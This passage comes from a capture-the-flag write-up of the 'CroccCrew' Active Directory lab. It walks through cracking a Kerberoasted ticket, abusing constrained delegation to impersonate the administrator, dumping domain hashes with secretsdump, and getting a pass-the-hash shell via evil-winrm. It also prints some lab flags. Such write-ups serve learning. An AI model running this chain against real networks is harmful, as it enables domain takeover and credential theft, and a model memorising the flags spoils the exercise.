3b300aade667efe1257bcea7bfdf4cc2017b678cb89fa34174481b96767bc2cd4a05756fa3ef43311cd642aed3fb87933d01685ee3965b211d4ea5e5c75e7dd0222a64b6f8714e8bc0abd7e7487acc80b96da5680100f4cecb720e4f3c4ca852499c3a4a2bf77587319a60c02b8c1947fdf43ade5360222d85903f5e648d28c474bf026ad9fe1bce39cd5d9dea767c31615048d0d1e08e538017d7d603cca398dfc0881c30384e3598ea42b2965e58cba8e616caab5db07417705f0fecca248695d5307470dd25bc1287069ea45bde51b3e71ece9f5d9c21dbf975753330816a53968cf744186b2c027d29883fa7ff05fe4dd47bd87ba93839d7ccd4a9a7ccd1cebb543e6d1ba9c0e939caa07962e66863eaf7ae6824e2d7d904d7c3ed9652fb3b5c1f9de03ef3057016b6bcb4d9945780a0ef7ea014f398aa1b5d8fc59c74f49d5b503995519b4fc824dba20b470f4412ae7a06f862b5b7c559047f28696ab08ed8e22bf6fea30e96d44f6c814bc24809ee020b74977c281e0b048d308ee217b3ae1c6931498b8ebe6b73d201da1d7b170dd67dd9c02e15c76100ff95dac4a97e122c219da2e8a90303fa80ded93bad2f4c7259e5e5936394bac2cb007d487bf056138c3336d0a297f2715f262159d6b51dd4d8fc7db199de56c8618818ba36857a9b16bc
Let’s see if we can crack this now using john
rob:CroccCrew/ $ john TGS.txt -w=/usr/share/wordlists/rockyou.txt --format=krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
resetpassword (?)
1g 0:00:00:00 DONE (2021-09-24 00:16) 5.000g/s 1187Kp/s 1187Kc/s 1187KC/s rikelme..nichel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Excellent, we have new creds, password-reset:resetpassword
What can we do with this though? Cue a lot of research as my AD attack knowlege is woefully lacking! Found a very good youtube video here
-
Going back over our findings so far highlights something that looked interesting
rob:CroccCrew/ $ impacket-GetUserSPNs 'COOCTUS.CORP/Visitor:GuestLogin!' -dc-ip 10.10.145.144 -request -outputfile TGS.txt Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- -------------- -------- -------------------------- -------------------------- ----------- HTTP/dc.cooctus.corp password-reset 2021-06-08 23:00:39.356663 2021-06-08 22:46:23.369540 constrainedWe can see a ‘constrained’ value in the ‘Delegation’ column
-
This connects up with something we saw earlier in our LDAP enumeration
The account password-resethad a flag that no other domain user had,TRUSTED_TO_AUTH_FOR_DELEGATION -
Some more googling finds a good article on this
When constrained delegation is set on an account, two things happen under the covers:
- The userAccountControl attribute for the object gets updated with the “TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION” flag
and
all the pieces I would want to exploit constrained delegation:
- A compromised account configured with constrained delegation
- A target privileged account to impersonate when requesting access to the service
- Information on the machine hosting the service I’ll be gaining access to
So, we have a compromised account with constrained delegation. We could simply aim high and try impersonating the administrator account and we know most things about the target machine, let’s try using this information then
First they use a tool called kekeo to get the ‘TGT’ - the “Ticket Granting Ticket”. We should be able to do the same thing with impacket again
rob:CroccCrew/ $ impacket-getTGT COOCTUS.CORP/password-reset:resetpassword -dc-ip 10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Saving ticket in password-reset.ccache
Ok, so far so good. Next they use this TGT to impersonate another user, again we have an impacket option for this
rob:CroccCrew/ $ impacket-getST -spn HTTP/dc.cooctus.corp -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user password-reset or initial TGT not forwardable
The SPN value is a bit of a guess, this is what we got in the output of our GetUserSPNs command earlier, back to google again!
We find another tool, findDelegation that shows us what exactly the constrained privileges we have are
rob:CroccCrew/ $ impacket-findDelegation -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
AccountName AccountType DelegationType DelegationRightsTo
-------------- ----------- ---------------------------------- -----------------------------------
password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS.CORP
password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP
password-reset Person Constrained w/ Protocol Transition oakley/DC
password-reset Person Constrained w/ Protocol Transition oakley/DC.COOCTUS.CORP/COOCTUS
password-reset Person Constrained w/ Protocol Transition oakley/DC/COOCTUS
When we try this new information in place of the SPN name we seem to get a little further
rob:CroccCrew/ $ impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate administrator -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/password-reset
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Excellent, with the administrator ticket we should now be able to extract the admin hash with secretsdump
rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass COOCTUS.CORP/administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
Of course, nothing is ever easy is it!
Turning on debug and specifying the target host gives us a little more information
rob:CroccCrew/ $ impacket-secretsdump -dc-ip 10.10.145.144 -k -no-pass -debug COOCTUS.CORP/administrator@10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python3.9/dist-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] SPN KRBTGT/COOCTUS.CORP@COOCTUS.CORP not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache.
[+] Trying to connect to KDC at 10.10.145.144
[+] Trying to connect to KDC at 10.10.145.144
[+] SMBConnection didn't work, hoping Kerberos will help (Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid))
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[+] Exiting NTDSHashes.dump() because SMB SessionError: STATUS_USER_SESSION_DELETED(The remote user session has been deleted.)
[*] Cleaning up...
These lines are interesting
[+] Using Kerberos Cache: administrator.ccache
[+] SPN CIFS/10.10.145.144@COOCTUS.CORP not found in cache
So is the address of the Domain Controller written into the ticket? Or the name rather I guess? The DC name used in the GetST command was DC.COOCTUS.CORP, perhaps if we add that to our hosts file? In a real life scenario it would of course be resolvable by DNS
rob:CroccCrew/ $ impacket-secretsdump -k -no-pass DC.COOCTUS.CORP
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xe748a0def7614d3306bd536cdc51bebe
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
COOCTUS\DC$:plain_password_hex:20e32c4c2471c0730dd322a4cd1068bebb17034932676917c1375b18d0fb2ab5710da01b79a6bef1a5a88ffc6946b710114ea28826d1dc889b67d29c4492ce3f0cbff2f11c8f13237832264563ae3ea81d53d9abd4c33f71d123df4a7f187af042e0c5b8d30ef19d0f038d855a7bc12f5f032a03bc13b3d2a2af91adfeb0391e6410ef4922e6a56d1b94ca9ef6ccbec53b7c685b091f2b60374529d85f79a0b0ccbaefb7fb0f61d623fa13a490ac385a0943b31ff6d4f604ad6569c593f9b112aa8fa4d746a4001d91ebf8b0dcfbd3cf5363ea370a347ea7aaf55e27f359f621986ee488059251efefee4b9c790910ea
COOCTUS\DC$:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdadf91990ade51602422e8283bad7a4771ca859b
dpapi_userkey:0x95ca7d2a7ae7ce38f20f1b11c22a05e5e23b321b
[*] NL$KM
0000 D5 05 74 5F A7 08 35 EA EC 25 41 2C 20 DC 36 0C ..t_..5..%A, .6.
0010 AC CE CB 12 8C 13 AC 43 58 9C F7 5C 88 E4 7A C3 .......CX..\..z.
0020 98 F2 BB EC 5F CB 14 63 1D 43 8C 81 11 1E 51 EC ...._..c.C....Q.
0030 66 07 6D FB 19 C4 2C 0E 9A 07 30 2A 90 27 2C 6B f.m...,...0*.',k
NL$KM:d505745fa70835eaec25412c20dc360caccecb128c13ac43589cf75c88e47ac398f2bbec5fcb14631d438c81111e51ec66076dfb19c42c0e9a07302a90272c6b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:'aad3b435b51404eeaad3b435b51404ee:add41095f1fb0405b32f70a489de022d':::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d4609747ddec61b924977ab42538797e:::
COOCTUS.CORP\Visitor:1109:aad3b435b51404eeaad3b435b51404ee:872a35060824b0e61912cb2e9e97bbb1:::
COOCTUS.CORP\mark:1115:aad3b435b51404eeaad3b435b51404ee:0b5e04d90dcab62cc0658120848244ef:::
COOCTUS.CORP\Jeff:1116:aad3b435b51404eeaad3b435b51404ee:1004ed2b099a7c8eaecb42b3d73cc9b7:::
COOCTUS.CORP\Spooks:1117:aad3b435b51404eeaad3b435b51404ee:07148bf4dacd80f63ef09a0af64fbaf9:::
COOCTUS.CORP\Steve:1119:aad3b435b51404eeaad3b435b51404ee:2ae85453d7d606ec715ef2552e16e9b0:::
COOCTUS.CORP\Howard:1120:aad3b435b51404eeaad3b435b51404ee:65340e6e2e459eea55ae539f0ec9def4:::
COOCTUS.CORP\admCroccCrew:1121:aad3b435b51404eeaad3b435b51404ee:0e2522b2d7b9fd08190a7f4ece342d8a:::
COOCTUS.CORP\Fawaz:1122:aad3b435b51404eeaad3b435b51404ee:d342c532bc9e11fc975a1e7fbc31ed8c:::
COOCTUS.CORP\karen:1123:aad3b435b51404eeaad3b435b51404ee:e5810f3c99ae2abb2232ed8458a61309:::
COOCTUS.CORP\cryillic:1124:aad3b435b51404eeaad3b435b51404ee:2d20d252a479f485cdf5e171d93985bf:::
COOCTUS.CORP\yumeko:1125:aad3b435b51404eeaad3b435b51404ee:c0e0e39ac7cab8c57c3543c04c340b49:::
COOCTUS.CORP\pars:1126:aad3b435b51404eeaad3b435b51404ee:fad642fb63dcc57a24c71bdc47e55a05:::
COOCTUS.CORP\kevin:1127:aad3b435b51404eeaad3b435b51404ee:48de70d96bf7b6874ec195cd5d389a09:::
COOCTUS.CORP\jon:1128:aad3b435b51404eeaad3b435b51404ee:7f828aaed37d032d7305d6d5016ccbb3:::
COOCTUS.CORP\Varg:1129:aad3b435b51404eeaad3b435b51404ee:7da62b00d4b258a03708b3c189b41a7e:::
COOCTUS.CORP\evan:1130:aad3b435b51404eeaad3b435b51404ee:8c4b625853d78e84fb8b3c4bcd2328c5:::
COOCTUS.CORP\Ben:1131:aad3b435b51404eeaad3b435b51404ee:1ce6fec89649608d974d51a4d6066f12:::
COOCTUS.CORP\David:1132:aad3b435b51404eeaad3b435b51404ee:f863e27063f2ccfb71914b300f69186a:::
COOCTUS.CORP\password-reset:1134:aad3b435b51404eeaad3b435b51404ee:0fed9c9dc78da2c6f37f885ee115585c:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:ab95841171b491c215c67a29687d3dc1:::
[*] Kerberos keys grabbed
--snip--
[*] Cleaning up...
We should be able to use evil-winrm now to pass this administrator hash (just the second half after the ‘:') and get a shell (finally!!)
rob:CroccCrew/ $ /opt/evil-winrm/evil-winrm.rb -i 10.10.145.144 -u administrator -H 'add41095f1fb0405b32f70a489de022d' -n
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cooctus\administrator
We use -n to specify no colours as this often messes up the command prompt
Backtracking as Administrator
As we’ve jumped here straight to administrator, which was our foothold was SO long and most probably not the intended method, we have to backtrack now to find the flags for the other key users
We can start with a quick search for the usual suspect
*Evil-WinRM* PS C:\Users\admCroccCrew> Get-Childitem -Path C:\ -Include *user*.txt* -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\Shares\Home
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2021 8:14 PM 17 user.txt
*Evil-WinRM* PS C:\Users\admCroccCrew> type C:\Shares\Home\user.txt
THM{REDACTED}
Ahh, that’s just the same flag again in the SMB share! However we do find some more useful files in that same directory (which presumably with the appropriate user access rights we could have seen via SMB)
*Evil-WinRM* PS C:\Shares\Home> dir
Directory: C:\Shares\Home
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/8/2021 12:38 PM 28 priv-esc-2.txt
-a---- 6/7/2021 8:08 PM 22 priv-esc.txt
-a---- 6/7/2021 8:14 PM 17 user.txt
So we can get #3
*Evil-WinRM* PS C:\Shares\Home> cat priv-esc.txt
THM{0n-Y0ur-Way-t0-DA}
And #4
*Evil-WinRM* PS C:\Shares\Home> cat priv-esc-2.txt
THM{Wh4t-t0-d0...Wh4t-t0-d0}
Lastly let’s do a search again for the root flag, #5
*Evil-WinRM* PS C:\Shares\Home> Get-Childitem -Path / -Include root.txt -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\PerfLogs\Admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/7/2021 8:07 PM 22 root.txt
And we finish the box with
*Evil-WinRM* PS C:\Shares\Home> type C:\PerfLogs\Admin\root.txt
THM{REDACTED}
NB: Reading through the writeups after the event, mainly to see if there was a more intended route than going directly to administrator, one of the writeups (by chrismeistre) had a great link that’s worth noting here for future reference. Also below is another link worth reading, cited by the first author as their main reference (also a perfect domain name! 😄)